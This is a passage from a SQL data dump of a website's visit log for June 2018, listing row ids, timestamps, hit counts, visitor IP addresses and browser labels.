05.134.182','other'),(253802,1528021026,1,1,0,0,'216.244.66.241','other'),(253803,1528021385,1,1,0,0,'178.154.171.88','other'),(253804,1528021393,1,1,0,0,'54.36.149.91','other'),(253805,1528021750,1,1,0,0,'54.36.148.239','other'),(253806,1528021887,3,3,0,0,'95.67.80.108','chrome'),(253807,1528022417,1,1,0,0,'54.36.148.69','other'),(253808,1528022469,2,2,0,0,'216.244.66.241','other'),(253809,1528022685,1,1,0,0,'5.83.17.180','chrome'),(253810,1528023141,4,4,0,0,'95.67.80.108','chrome'),(253811,1528023169,1,1,0,0,'54.36.149.42','other'),(253812,1528023199,1,1,0,0,'46.161.9.39','chrome'),(253813,1528023231,1,1,0,0,'141.8.142.74','other'),(253814,1528023437,1,1,0,0,'54.36.148.87','other'),(253815,1528023752,1,1,0,0,'66.249.69.201','chrome'),(253816,1528023911,1,1,0,0,'54.36.149.62','other'),(253817,1528023955,1,1,0,0,'54.36.148.211','other'),(253818,1528024099,7,7,0,0,'95.67.80.108','chrome'),(253819,1528024373,1,1,0,0,'54.36.148.190','other'),(253820,1528024436,2,2,0,0,'91.196.178.30','chrome'),(253821,1528024488,1,1,0,0,'40.77.167.65','other'),(253822,1528024509,1,1,0,0,'62.205.134.182','other'),(253823,1528024556,1,1,0,0,'54.36.148.186','other'),(253824,1528024801,1,1,0,0,'54.36.148.217','other'),(253825,1528024926,1,0,1,0,'66.249.75.29',''),(253826,1528025071,1,1,0,0,'54.36.149.91','other'),(253827,1528025223,8,8,0,0,'95.67.80.108','chrome'),(253828,1528025353,1,1,0,0,'54.36.148.138','other'),(253829,1528025778,1,1,0,0,'141.8.142.74','other'),(253830,1528025833,1,1,0,0,'8.29.198.26','other'),(253831,1528025930,1,1,0,0,'37.9.113.182','other'),(253832,1528026137,1,1,0,0,'54.36.148.232','other'),(253833,1528026223,2,2,0,0,'95.67.80.108','chrome'),(253834,1528026775,1,1,0,0,'54.36.148.53','other'),(253835,1528027104,1,1,0,0,'54.36.148.110','other'),(253836,1528027214,1,1,0,0,'216.244.66.241','other'),(253837,1528027400,1,1,0,0,'54.36.148.215','other'),(253838,1528027491,1,1,0,0,'54.36.149.87','other'),(253839,1528027526,4,4,0,0,'95.67.80.108','chrome'),(253840,1528027779,1,1,0,0,'54.36.148.174','other'),(253841,1528027780,1,1,0,0,'54.36.149.41','other'),(253842,1528027891,1,1,0,0,'54.36.149.104','other'),(253843,1528027899,1,1,0,0,'54.36.149.35','other'),(253844,1528028108,1,1,0,0,'62.205.134.182','other'),(253845,1528028559,2,2,0,0,'95.67.80.108','chrome'),(253846,1528028857,3,3,0,0,'216.244.66.241','other'),(253847,1528029052,1,1,0,0,'54.36.148.148','other'),(253848,1528029590,5,5,0,0,'95.67.80.108','chrome'),(253849,1528029961,1,1,0,0,'54.36.148.155','other'),(253850,1528030048,1,1,0,0,'54.36.148.93','other'),(253851,1528030540,1,1,0,0,'54.36.148.242','other'),(253852,1528030578,1,1,0,0,'54.36.149.10','other'),(253853,1528030769,1,1,0,0,'54.36.149.104','other'),(253854,1528030777,2,2,0,0,'216.244.66.241','other'),(253855,1528030819,1,1,0,0,'54.36.149.0','other'),(253856,1528030836,5,5,0,0,'95.67.80.108','chrome'),(253857,1528030839,1,1,0,0,'54.36.149.79','other'),(253858,1528031375,1,1,0,0,'8.29.198.26','other'),(253859,1528031446,1,1,0,0,'54.36.148.162','other'),(253860,1528031708,1,1,0,0,'62.205.134.182','other'),(253861,1528031815,1,1,0,0,'54.36.148.97','other'),(253862,1528031869,2,2,0,0,'216.244.66.241','other'),(253863,1528032215,3,3,0,0,'95.67.80.108','chrome'),(253864,1528032482,1,1,0,0,'54.36.148.51','other'),(253865,1528032534,1,1,0,0,'54.165.59.7','other'),(253866,1528032671,1,1,0,0,'54.36.148.134','other'),(253867,1528032813,1,1,0,0,'54.36.148.210','other'),(253868,1528033116,5,5,0,0,'95.67.80.108','chrome'),(253869,1528033119,1,1,0,0,'54.36.148.167','other'),(253870,1528033273,1,0,1,0,'66.249.69.201',''),(253871,1528033315,1,1,0,0,'95.163.255.99','other'),(253872,1528034010,1,1,0,0,'162.210.196.129','other'),(253873,1528034071,1,1,0,0,'216.244.66.241','other'),(253874,1528034370,6,6,0,0,'95.67.80.108','chrome'),(253875,1528034430,1,1,0,0,'54.36.149.105','other'),(253876,1528035039,1,1,0,0,'66.249.69.201','chrome'),(253877,1528035309,1,1,0,0,'62.205.134.182','other'),(253878,1528035411,3,3,0,0,'95.67.80.108','chrome'),(253879,1528035867,1,1,0,0,'157.55.39.74','other'),(253880,1528036394,1,1,0,0,'54.36.149.12','other'),(253881,1528036493,1,1,0,0,'54.36.148.183','other'),(253882,1528036606,3,3,0,0,'95.67.80.108','chrome'),(253883,1528036629,1,1,0,0,'54.36.148.132','other'),(253884,1528036673,1,1,0,0,'8.29.198.27','other'),(253885,1528036845,1,1,0,0,'54.36.148.241','other'),(253886,1528036972,1,1,0,0,'54.36.148.246','other'),(253887,1528037029,1,1,0,0,'54.36.149.13','other'),(253888,1528037096,1,1,0,0,'54.36.149.38','other'),(253889,1528037126,1,1,0,0,'37.9.113.182','other'),(253890,1528037183,1,1,0,0,'194.44.220.194','firefox'),(253891,1528037289,1,1,0,0,'54.36.148.47','other'),(253892,1528037344,1,1,0,0,'180.76.15.155','other'),(253893,1528037710,1,1,0,0,'54.36.149.64','other'),(253894,1528037741,1,1,0,0,'54.36.148.124','other'),(253895,1528037783,3,3,0,0,'95.67.80.108','chrome'),(253896,1528038289,1,1,0,0,'157.55.39.74','other'),(253897,1528038292,1,1,0,0,'54.36.148.84','other'),(253898,1528038400,1,1,0,0,'66.249.69.201','chrome'),(253899,1528038414,1,1,0,0,'54.36.148.76','other'),(253900,1528038421,1,1,0,0,'216.244.66.241','other'),(253901,1528038446,1,1,0,0,'54.36.148.67','other'),(253902,1528038454,1,0,1,0,'66.249.75.29',''),(253903,1528038605,1,1,0,0,'194.44.220.194','firefox'),(253904,1528038821,1,1,0,0,'54.36.149.35','other'),(253905,1528038908,1,1,0,0,'62.205.134.182','other'),(253906,1528038922,1,1,0,0,'54.36.148.78','other'),(253907,1528039011,1,1,0,0,'54.36.149.19','other'),(253908,1528039193,1,1,0,0,'54.36.148.192','other'),(253909,1528039209,1,1,0,0,'54.36.149.68','other'),(253910,1528039591,2,2,0,0,'66.249.69.195','chrome'),(253911,1528039770,1,1,0,0,'144.76.220.40','other'),(253912,1528040724,1,1,0,0,'54.36.149.41','other'),(253913,1528040935,1,1,0,0,'54.36.149.90','other'),(253914,1528041099,1,1,0,0,'95.67.80.108','chrome'),(253915,1528041140,1,1,0,0,'54.36.148.236','other'),(253916,1528041211,1,1,0,0,'54.36.148.150','other'),(253917,1528041242,1,1,0,0,'54.36.148.225','other'),(253918,1528041288,1,1,0,0,'54.36.148.178','other'),(253919,1528041329,1,1,0,0,'54.36.148.207','other'),(253920,1528041502,1,1,0,0,'54.36.148.164','other'),(253921,1528041773,1,1,0,0,'54.36.149.53','other'),(253922,1528041789,1,1,0,0,'54.36.148.154','other'),(253923,1528042067,3,3,0,0,'95.67.80.108','chrome'),(253924,1528042216,1,1,0,0,'8.29.198.27','other'),(253925,1528042374,1,1,0,0,'207.46.13.177','other'),(253926,1528042508,1,1,0,0,'62.205.134.182','other'),(253927,1528042930,1,1,0,0,'54.36.148.19','other'),(253928,1528043038,1,1,0,0,'141.8.142.74','other'),(253929,1528043433,1,1,0,0,'54.36.148.129','other'),(253930,1528043588,1,1,0,0,'54.36.148.243','other'),(253931,1528043648,2,2,0,0,'95.67.80.108','chrome'),(253932,1528043954,1,1,0,0,'208.110.93.52','other'),(253933,1528044601,1,1,0,0,'54.36.148.116','other'),(253934,1528044801,3,3,0,0,'95.67.80.108','chrome'),(253935,1528044820,1,0,1,0,'66.249.69.201',''),(253936,1528045000,1,1,0,0,'141.8.142.74','other'),(253937,1528045078,1,1,0,0,'54.36.148.229','other'),(253938,1528045139,1,1,0,0,'54.36.148.179','other'),(253939,1528045948,1,1,0,0,'54.36.148.17','other'),(253940,1528046108,1,1,0,0,'62.205.134.182','other'),(253941,1528046180,1,1,0,0,'54.36.149.32','other'),(253942,1528047013,1,1,0,0,'54.36.149.89','other'),(253943,1528047293,2,2,0,0,'95.67.80.108','chrome'),(253944,1528047514,1,1,0,0,'8.29.198.25','other'),(253945,1528047556,1,1,0,0,'91.209.11.236','other'),(253946,1528047569,1,1,0,0,'54.36.148.116','other'),(253947,1528048016,2,2,0,0,'91.196.178.162','chrome'),(253948,1528048137,1,1,0,0,'92.52.170.125','chrome'),(253949,1528048746,1,1,0,0,'95.67.80.108','chrome'),(253950,1528048769,1,1,0,0,'54.36.149.99','other'),(253951,1528049298,1,1,0,0,'54.36.149.73','other'),(253952,1528049671,1,1,0,0,'54.36.149.68','other'),(253953,1528049709,1,1,0,0,'62.205.134.182','other'),(253954,1528049748,1,1,0,0,'54.36.148.219','other'),(253955,1528049883,1,1,0,0,'66.249.69.195','chrome'),(253956,1528050173,3,3,0,0,'95.67.80.108','chrome'),(253957,1528050440,1,1,0,0,'178.95.245.18','chrome'),(253958,1528050476,1,1,0,0,'94.179.247.110','chrome'),(253959,1528050537,1,1,0,0,'141.8.142.74','other'),(253960,1528050743,1,1,0,0,'54.36.149.62','other'),(253961,1528050860,1,1,0,0,'178.154.171.88','other'),(253962,1528050934,1,1,0,0,'54.36.148.101','other'),(253963,1528051012,1,1,0,0,'216.244.66.241','other'),(253964,1528051544,1,1,0,0,'54.36.149.75','other'),(253965,1528051565,1,1,0,0,'54.36.148.98','other'),(253966,1528051636,1,1,0,0,'54.36.149.33','other'),(253967,1528051773,1,1,0,0,'54.36.149.86','other'),(253968,1528051799,1,1,0,0,'54.36.148.137','other'),(253969,1528051825,1,1,0,0,'54.36.148.213','other'),(253970,1528052299,1,1,0,0,'95.67.80.108','chrome'),(253971,1528052808,1,1,0,0,'54.36.148.170','other'),(253972,1528053050,1,1,0,0,'8.29.198.25','other'),(253973,1528053070,1,1,0,0,'54.36.148.171','other'),(253974,1528053317,1,1,0,0,'62.205.134.182','other'),(253975,1528053656,1,1,0,0,'54.36.148.163','other'),(253976,1528054458,1,1,0,0,'66.249.69.201','chrome'),(253977,1528054652,2,2,0,0,'95.67.80.108','chrome'),(253978,1528056815,1,1,0,0,'109.201.133.100','opera'),(253979,1528056909,1,1,0,0,'62.205.134.182','other'),(253980,1528056963,1,1,0,0,'157.55.39.56','other'),(253981,1528056996,2,2,0,0,'95.67.80.108','chrome'),(253982,1528057789,2,2,0,0,'216.244.66.241','other'),(253983,1528058266,3,3,0,0,'95.67.80.108','chrome'),(253984,1528058355,1,1,0,0,'8.29.198.26','other'),(253985,1528058520,1,0,1,0,'66.249.75.29',''),(253986,1528058572,1,1,0,0,'178.154.200.7','other'),(253987,1528059151,2,2,0,0,'216.244.66.241','other'),(253988,1528059526,1,1,0,0,'95.67.80.108','chrome'),(253989,1528060509,1,1,0,0,'62.205.134.182','other'),(253990,1528060539,1,1,0,0,'141.8.132.22','other'),(253991,1528060540,5,5,0,0,'95.67.80.108','chrome'),(253992,1528060790,1,1,0,0,'216.244.66.241','other'),(253993,1528061475,5,5,0,0,'95.67.80.108','chrome'),(253994,1528061635,1,1,0,0,'46.147.114.145','msie'),(253995,1528061897,1,0,1,0,'66.249.69.199',''),(253996,1528062449,3,3,0,0,'216.244.66.241','other'),(253997,1528062683,2,2,0,0,'167.114.1.124','other'),(253998,1528062927,1,1,0,0,'141.8.142.152','other'),(253999,1528063413,1,1,0,0,'95.67.80.108','chrome'),(254000,1528063490,1,1,0,0,'37.9.113.115','other'),(254001,1528063885,1,1,0,0,'8.29.198.26','other'),(254002,1528064109,1,1,0,0,'62.205.134.182','other'),(254003,1528064446,1,1,0,0,'193.106.30.99','firefox'),(254004,1528064936,1,1,0,0,'37.9.113.134','other'),(254005,1528065157,1,1,0,0,'216.244.66.241','other'),(254006,1528065520,1,1,0,0,'207.46.13.97','other'),(254007,1528065706,1,1,0,0,'95.67.80.108','chrome'),(254008,1528066604,4,4,0,0,'216.244.66.241','other'),(254009,1528067469,1,1,0,0,'95.67.80.108','chrome'),(254010,1528067710,1,1,0,0,'62.205.134.182','other'),(254011,1528068072,3,3,0,0,'216.244.66.241','other'),(254012,1528068489,1,1,0,0,'46.161.9.39','firefox'),(254013,1528068566,1,0,1,0,'66.249.69.201',''),(254014,1528068982,4,4,0,0,'95.67.80.108','chrome'),(254015,1528069196,1,1,0,0,'8.29.198.25','other'),(254016,1528069614,1,1,0,0,'157.55.39.177','other'),(254017,1528069710,1,1,0,0,'157.55.39.113','other'),(254018,1528070021,1,1,0,0,'157.55.39.122','other'),(254019,1528070212,3,3,0,0,'95.67.80.108','chrome'),(254020,1528070251,1,1,0,0,'141.8.142.167','other'),(254021,1528070268,1,0,1,0,'66.249.75.28',''),(254022,1528070648,1,0,1,0,'66.249.75.30',''),(254023,1528071307,1,1,0,0,'62.205.134.182','other'),(254024,1528071856,1,1,0,0,'95.67.80.108','chrome'),(254025,1528072173,1,1,0,0,'87.250.224.85','other'),(254026,1528072802,3,3,0,0,'95.67.80.108','chrome'),(254027,1528073119,1,0,1,0,'66.249.69.195',''),(254028,1528073443,1,0,1,0,'66.249.69.201',''),(254029,1528073684,1,1,0,0,'54.165.59.7','other'),(254030,1528074735,1,1,0,0,'8.29.198.26','other'),(254031,1528074909,1,1,0,0,'62.205.134.182','other'),(254032,1528075130,2,2,0,0,'95.67.80.108','chrome'),(254033,1528075514,2,2,0,0,'54.165.59.7','other'),(254034,1528076037,2,2,0,0,'216.244.66.241','other'),(254035,1528076330,3,3,0,0,'95.67.80.108','chrome'),(254036,1528076492,1,1,0,0,'157.55.39.188','other'),(254037,1528077576,3,3,0,0,'216.244.66.241','other'),(254038,1528078300,2,2,0,0,'95.67.80.108','chrome'),(254039,1528078508,1,1,0,0,'62.205.134.182','other'),(254040,1528079231,1,1,0,0,'31.173.80.110','other'),(254041,1528080028,2,2,0,0,'95.67.80.108','chrome'),(254042,1528080034,1,1,0,0,'8.29.198.26','other'),(254043,1528081375,3,3,0,0,'95.67.80.108','chrome'),(254044,1528081796,1,1,0,0,'87.250.224.66','other'),(254045,1528082109,1,1,0,0,'62.205.134.182','other'),(254046,1528082299,2,2,0,0,'95.67.80.108','chrome'),(254047,1528084170,19,19,0,0,'192.151.145.82','other'),(254048,1528084246,1,1,0,0,'95.67.80.108','chrome'),(254049,1528085163,1,1,0,0,'216.244.66.241','other'),(254050,1528085516,1,1,0,0,'180.76.15.7','other'),(254051,1528085579,1,1,0,0,'8.29.198.25','other'),(254052,1528085710,1,1,0,0,'62.205.134.182','other'),(254053,1528085915,1,1,0,0,'95.67.80.108','chrome'),(254054,1528087257,1,0,1,0,'66.249.75.28',''),(254055,1528087493,2,2,0,0,'192.151.145.82','other'),(254056,1528089308,1,1,0,0,'62.205.134.182','other'),(254057,1528089328,1,1,0,0,'95.67.80.108','chrome'),(254058,1528090023,1,1,0,0,'95.163.255.118','other'),(254059,1528090276,4,4,0,0,'95.67.80.108','chrome'),(254060,1528090406,1,1,0,0,'141.8.142.74','other'),(254061,1528090425,1,0,1,0,'66.249.69.201',''),(254062,1528090875,1,1,0,0,'8.29.198.25','other'),(254063,1528090890,1,1,0,0,'37.55.77.44','chrome'),(254064,1528091237,2,2,0,0,'95.67.80.108','chrome'),(254065,1528091629,1,1,0,0,'178.154.171.88','other'),(254066,1528091945,1,1,0,0,'216.244.66.241','other'),(254067,1528092180,2,2,0,0,'91.196.178.89','firefox'),(254068,1528092217,1,1,0,0,'66.249.69.195','chrome'),(254069,1528092243,1,1,0,0,'91.196.178.74','firefox'),(254070,1528092305,1,1,0,0,'46.200.36.78','chrome'),(254071,1528092583,1,1,0,0,'95.163.255.105','other'),(254072,1528092604,3,3,0,0,'91.196.177.46','chrome'),(254073,1528092655,4,4,0,0,'95.67.80.108','chrome'),(254074,1528092733,1,1,0,0,'193.107.72.66','other'),(254075,1528092910,1,1,0,0,'62.205.134.182','other'),(254076,1528093703,1,1,0,0,'91.245.99.214','chrome'),(254077,1528094190,3,3,0,0,'194.44.220.197','firefox'),(254078,1528094238,3,3,0,0,'95.67.80.108','chrome'),(254079,1528094773,1,0,1,0,'66.249.69.195',''),(254080,1528094821,1,1,0,0,'66.249.75.28','chrome'),(254081,1528094852,1,0,1,0,'66.249.69.199',''),(254082,1528095121,1,1,0,0,'195.3.207.50','chrome'),(254083,1528095165,5,5,0,0,'95.67.80.108','chrome'),(254084,1528095616,1,1,0,0,'198.211.121.79','chrome'),(254085,1528095697,1,1,0,0,'66.249.75.29','chrome'),(254086,1528096244,3,3,0,0,'95.67.80.108','chrome'),(254087,1528096383,1,1,0,0,'91.124.182.170','firefox'),(254088,1528096402,1,1,0,0,'178.154.171.88','other'),(254089,1528096419,1,1,0,0,'8.29.198.26','other'),(254090,1528096510,1,1,0,0,'62.205.134.182','other'),(254091,1528097930,3,3,0,0,'95.67.80.108','chrome'),(254092,1528098014,1,1,0,0,'91.196.178.74','firefox'),(254093,1528098994,1,0,1,0,'66.249.69.195',''),(254094,1528099149,1,1,0,0,'178.154.171.88','other'),(254095,1528099301,1,1,0,0,'91.196.178.102','chrome'),(254096,1528099638,2,2,0,0,'95.67.80.108','chrome'),(254097,1528099902,1,1,0,0,'157.55.39.67','other'),(254098,1528100112,1,1,0,0,'62.205.134.182','other'),(254099,1528100295,2,2,0,0,'195.230.119.59','chrome'),(254100,1528100627,1,1,0,0,'141.8.142.74','other'),(254101,1528100629,1,1,0,0,'178.154.171.88','other'),(254102,1528101205,2,2,0,0,'95.67.80.108','chrome'),(254103,1528101275,1,1,0,0,'216.244.66.241','other'),(254104,1528101310,1,1,0,0,'178.140.234.222','msie'),(254105,1528101704,1,1,0,0,'8.29.198.25','other'),(254106,1528102458,1,0,1,0,'66.249.75.30',''),(254107,1528102633,2,2,0,0,'95.67.80.108','chrome'),(254108,1528102674,2,2,0,0,'91.196.178.167','chrome'),(254109,1528103710,1,1,0,0,'62.205.134.182','other'),(254110,1528103954,1,0,1,0,'66.249.75.29',''),(254111,1528103960,1,1,0,0,'47.96.234.201','other'),(254112,1528103987,5,5,0,0,'95.67.80.108','chrome'),(254113,1528104935,5,5,0,0,'95.67.80.108','chrome'),(254114,1528105401,1,1,0,0,'216.244.66.241','other'),(254115,1528105885,2,2,0,0,'95.67.80.108','chrome'),(254116,1528107205,6,6,0,0,'95.67.80.108','chrome'),(254117,1528107263,1,1,0,0,'8.29.198.25','other'),(254118,1528107269,1,1,0,0,'216.244.66.241','other'),(254119,1528107318,1,1,0,0,'62.205.134.182','other'),(254120,1528108303,1,1,0,0,'130.180.218.104','chrome'),(254121,1528108784,5,5,0,0,'95.67.80.108','chrome'),(254122,1528108793,1,1,0,0,'91.196.178.89','firefox'),(254123,1528109676,1,0,1,0,'66.249.75.29',''),(254124,1528109699,2,2,0,0,'95.67.80.108','chrome'),(254125,1528110710,1,0,1,0,'66.249.69.201',''),(254126,1528110853,1,1,0,0,'216.244.66.241','other'),(254127,1528110910,1,1,0,0,'62.205.134.182','other'),(254128,1528111073,2,2,0,0,'95.67.80.108','chrome'),(254129,1528111939,1,1,0,0,'78.154.176.176','chrome'),(254130,1528112293,2,2,0,0,'91.196.178.85','chrome'),(254131,1528112356,4,4,0,0,'95.67.80.108','chrome'),(254132,1528112420,1,1,0,0,'91.196.178.73','chrome'),(254133,1528112545,1,1,0,0,'8.29.198.25','other'),(254134,1528112734,1,1,0,0,'91.124.182.170','firefox'),(254135,1528112815,1,1,0,0,'216.244.66.241','other'),(254136,1528113181,1,1,0,0,'46.211.157.34','other'),(254137,1528113829,3,3,0,0,'95.67.80.108','chrome'),(254138,1528114001,1,1,0,0,'31.43.31.244','chrome'),(254139,1528114508,1,1,0,0,'62.205.134.182','other'),(254140,1528114643,1,1,0,0,'91.196.178.131','firefox'),(254141,1528114909,1,1,0,0,'216.244.66.241','other'),(254142,1528115273,5,5,0,0,'95.67.80.108','chrome'),(254143,1528115645,1,1,0,0,'94.178.97.28','chrome'),(254144,1528115773,1,1,0,0,'95.163.255.92','other'),(254145,1528116424,4,4,0,0,'95.67.80.108','chrome'),(254146,1528116457,1,1,0,0,'77.93.41.218','chrome'),(254147,1528117137,1,0,1,0,'66.249.69.201',''),(254148,1528117177,1,1,0,0,'157.55.13.65','other'),(254149,1528117347,2,2,0,0,'199.247.11.172','chrome'),(254150,1528117550,1,1,0,0,'194.242.103.154','chrome'),(254151,1528118009,2,2,0,0,'95.67.80.108','chrome'),(254152,1528118109,1,1,0,0,'62.205.134.182','other'),(254153,1528118115,1,1,0,0,'8.29.198.26','other'),(254154,1528118487,1,1,0,0,'178.154.171.88','other'),(254155,1528118973,2,2,0,0,'95.67.80.108','chrome'),(254156,1528119547,1,1,0,0,'162.210.196.100','other'),(254157,1528119974,3,3,0,0,'37.54.73.229','chrome'),(254158,1528119978,1,1,0,0,'37.55.222.191','chrome'),(254159,1528120276,1,1,0,0,'178.154.171.88','other'),(254160,1528120411,2,2,0,0,'141.8.142.74','other'),(254161,1528120678,1,1,0,0,'180.76.15.23','other'),(254162,1528120905,1,1,0,0,'95.67.80.108','chrome'),(254163,1528121710,1,1,0,0,'62.205.134.182','other'),(254164,1528122014,3,3,0,0,'95.67.80.108','chrome'),(254165,1528122629,1,1,0,0,'95.163.255.93','other'),(254166,1528122630,1,1,0,0,'207.46.13.167','other'),(254167,1528123081,1,1,0,0,'216.244.66.241','other'),(254168,1528123379,1,1,0,0,'8.29.198.26','other'),(254169,1528123522,4,4,0,0,'95.67.80.108','chrome'),(254170,1528123655,1,1,0,0,'176.99.202.34','chrome'),(254171,1528123967,1,1,0,0,'178.154.171.88','other'),(254172,1528124209,1,1,0,0,'95.163.255.97','other'),(254173,1528124502,4,4,0,0,'95.67.80.108','chrome'),(254174,1528124547,1,1,0,0,'141.8.142.74','other'),(254175,1528124998,1,1,0,0,'193.106.30.99','firefox'),(254176,1528125310,1,1,0,0,'62.205.134.182','other'),(254177,1528125427,6,6,0,0,'95.67.80.108','chrome'),(254178,1528125544,1,1,0,0,'180.76.15.18','other'),(254179,1528126116,1,1,0,0,'62.205.134.182','msie'),(254180,1528127040,3,3,0,0,'95.67.80.108','chrome'),(254181,1528127598,1,1,0,0,'216.244.66.241','other'),(254182,1528127636,1,1,0,0,'37.204.211.30','msie'),(254183,1528128142,1,1,0,0,'91.196.177.46','chrome'),(254184,1528128167,1,0,1,0,'66.249.64.30',''),(254185,1528128177,5,5,0,0,'95.67.80.108','chrome'),(254186,1528128909,1,1,0,0,'62.205.134.182','other'),(254187,1528128955,1,1,0,0,'8.29.198.26','other'),(254188,1528129482,1,1,0,0,'188.230.43.254','other'),(254189,1528129566,4,4,0,0,'95.67.80.108','chrome'),(254190,1528131044,1,1,0,0,'66.249.64.29','chrome'),(254191,1528131117,1,1,0,0,'141.8.142.74','other'),(254192,1528131368,2,2,0,0,'95.67.80.108','chrome'),(254193,1528131880,1,1,0,0,'188.230.43.254','other'),(254194,1528131892,1,1,0,0,'216.244.66.241','other'),(254195,1528132523,1,1,0,0,'62.205.134.182','other'),(254196,1528132768,2,2,0,0,'95.67.80.108','chrome'),(254197,1528132836,2,0,2,0,'66.249.64.30',''),(254198,1528133626,1,1,0,0,'141.8.142.74','other'),(254199,1528133673,3,3,0,0,'95.67.80.108','chrome'),(254200,1528133759,1,1,0,0,'66.249.64.28','chrome'),(254201,1528134206,1,1,0,0,'8.29.198.25','other'),(254202,1528134234,1,1,0,0,'54.165.59.7','other'),(254203,1528134284,1,1,0,0,'188.230.43.254','other'),(254204,1528134644,2,2,0,0,'95.67.80.108','chrome'),(254205,1528135431,1,1,0,0,'80.252.155.198','chrome'),(254206,1528135717,5,5,0,0,'95.67.80.108','chrome'),(254207,1528135780,1,1,0,0,'216.244.66.241','other'),(254208,1528136108,1,1,0,0,'62.205.134.182','other'),(254209,1528136583,1,0,1,0,'66.249.64.28',''),(254210,1528136600,2,2,0,0,'95.133.193.237','chrome'),(254211,1528136682,1,1,0,0,'188.230.43.254','other'),(254212,1528136685,1,1,0,0,'141.8.142.74','other'),(254213,1528137005,2,2,0,0,'91.196.178.29','chrome'),(254214,1528137339,2,2,0,0,'216.244.66.241','other'),(254215,1528137845,1,1,0,0,'91.196.178.76','firefox'),(254216,1528138183,2,2,0,0,'95.67.80.108','chrome'),(254217,1528139298,3,3,0,0,'95.67.80.108','chrome'),(254218,1528139510,1,1,0,0,'157.55.39.158','other'),(254219,1528139713,1,1,0,0,'62.205.134.182','other'),(254220,1528139797,1,1,0,0,'8.29.198.26','other'),(254221,1528139849,2,2,0,0,'66.249.64.30','chrome'),(254222,1528139857,1,1,0,0,'142.4.200.37','other'),(254223,1528140255,3,3,0,0,'95.67.80.108','chrome'),(254224,1528140261,1,1,0,0,'77.111.246.15','chrome'),(254225,1528140318,1,1,0,0,'188.163.0.196','other'),(254226,1528140499,1,0,1,0,'66.249.64.28',''),(254227,1528140512,1,1,0,0,'157.55.39.158','other'),(254228,1528140634,1,1,0,0,'220.181.132.191','chrome'),(254229,1528141033,1,1,0,0,'54.36.148.15','other'),(254230,1528141215,1,1,0,0,'54.36.148.212','other'),(254231,1528141410,1,1,0,0,'54.36.148.65','other'),(254232,1528141488,1,1,0,0,'54.36.148.151','other'),(254233,1528141521,1,1,0,0,'95.67.80.108','chrome'),(254234,1528141695,1,1,0,0,'54.36.148.224','other'),(254235,1528141807,2,2,0,0,'92.113.127.67','chrome'),(254236,1528141859,1,1,0,0,'54.36.148.203','other'),(254237,1528141874,1,1,0,0,'141.8.142.74','other'),(254238,1528142160,1,1,0,0,'54.36.148.38','other'),(254239,1528142257,1,1,0,0,'54.36.149.43','other'),(254240,1528142514,1,1,0,0,'54.36.148.185','other'),(254241,1528142517,2,2,0,0,'95.67.80.108','chrome'),(254242,1528142595,1,1,0,0,'54.36.148.26','other'),(254243,1528142668,1,1,0,0,'216.244.66.241','other'),(254244,1528142804,1,1,0,0,'54.36.148.20','other'),(254245,1528143048,1,1,0,0,'54.36.148.112','other'),(254246,1528143265,2,2,0,0,'91.196.178.35','chrome'),(254247,1528143309,1,1,0,0,'62.205.134.182','other'),(254248,1528143324,1,1,0,0,'54.36.149.23','other'),(254249,1528143329,1,1,0,0,'54.36.149.37','other'),(254250,1528143428,1,1,0,0,'54.36.149.36','other'),(254251,1528143583,1,1,0,0,'54.36.148.38','other'),(254252,1528143630,1,1,0,0,'54.36.148.115','other'),(254253,1528143835,1,1,0,0,'54.36.148.40','other'),(254254,1528143919,1,1,0,0,'54.36.149.71','other'),(254255,1528144125,1,1,0,0,'95.67.80.108','chrome'),(254256,1528144329,1,1,0,0,'54.36.148.72','other'),(254257,1528144407,1,1,0,0,'54.36.149.32','other'),(254258,1528144496,1,1,0,0,'54.36.148.107','other'),(254259,1528144783,1,1,0,0,'54.36.149.78','other'),(254260,1528144799,1,1,0,0,'54.36.149.30','other'),(254261,1528145037,1,1,0,0,'8.29.198.26','other'),(254262,1528145195,1,1,0,0,'54.36.148.163','other'),(254263,1528145233,1,1,0,0,'54.36.148.138','other'),(254264,1528145309,1,1,0,0,'54.36.148.98','other'),(254265,1528145378,1,1,0,0,'54.36.149.3','other'),(254266,1528145392,1,1,0,0,'77.111.247.70','chrome'),(254267,1528145550,1,1,0,0,'95.67.80.108','chrome'),(254268,1528145561,1,1,0,0,'54.36.148.15','other'),(254269,1528145647,1,1,0,0,'54.36.148.235','other'),(254270,1528145682,1,1,0,0,'54.36.149.100','other'),(254271,1528146189,2,2,0,0,'141.8.142.74','other'),(254272,1528146245,1,1,0,0,'178.154.171.88','other'),(254273,1528146276,1,1,0,0,'54.36.148.121','other'),(254274,1528146289,1,1,0,0,'54.36.149.93','other'),(254275,1528146524,1,1,0,0,'54.36.148.113','other'),(254276,1528146781,1,1,0,0,'54.36.149.88','other'),(254277,1528146887,1,1,0,0,'54.36.149.63','other'),(254278,1528146910,1,1,0,0,'62.205.134.182','other'),(254279,1528146976,1,1,0,0,'54.36.149.30','other'),(254280,1528147191,1,1,0,0,'54.36.148.100','other'),(254281,1528147282,1,1,0,0,'91.209.11.236','other'),(254282,1528147616,1,1,0,0,'180.76.15.19','other'),(254283,1528147690,1,1,0,0,'54.36.149.42','other'),(254284,1528148080,1,1,0,0,'54.36.149.5','other'),(254285,1528148104,3,3,0,0,'141.8.142.74','other'),(254286,1528148200,1,1,0,0,'54.36.148.39','other'),(254287,1528148218,1,1,0,0,'40.77.167.169','other'),(254288,1528148285,1,1,0,0,'54.36.149.66','other'),(254289,1528148432,1,1,0,0,'54.36.149.95','other'),(254290,1528148696,1,1,0,0,'54.36.148.29','other'),(254291,1528148745,1,1,0,0,'54.36.149.64','other'),(254292,1528148757,1,1,0,0,'54.36.148.214','other'),(254293,1528148790,1,1,0,0,'54.36.148.220','other'),(254294,1528148901,1,1,0,0,'54.36.148.19','other'),(254295,1528149049,1,1,0,0,'54.36.149.104','other'),(254296,1528149112,1,1,0,0,'54.36.149.61','other'),(254297,1528149383,1,1,0,0,'54.36.148.141','other'),(254298,1528149442,1,1,0,0,'216.244.66.241','other'),(254299,1528149811,1,1,0,0,'54.36.149.41','other'),(254300,1528149890,1,1,0,0,'95.67.80.108','chrome'),(254301,1528149977,1,1,0,0,'54.36.148.50','other'),(254302,1528149996,1,1,0,0,'54.36.148.179','other'),(254303,1528150050,1,1,0,0,'54.236.51.16','other'),(254304,1528150095,1,1,0,0,'54.36.148.75','other'),(254305,1528150153,1,1,0,0,'54.36.148.164','other'),(254306,1528150379,1,1,0,0,'54.36.148.137','other'),(254307,1528150417,1,1,0,0,'54.36.148.250','other'),(254308,1528150462,1,1,0,0,'54.36.148.20','other'),(254309,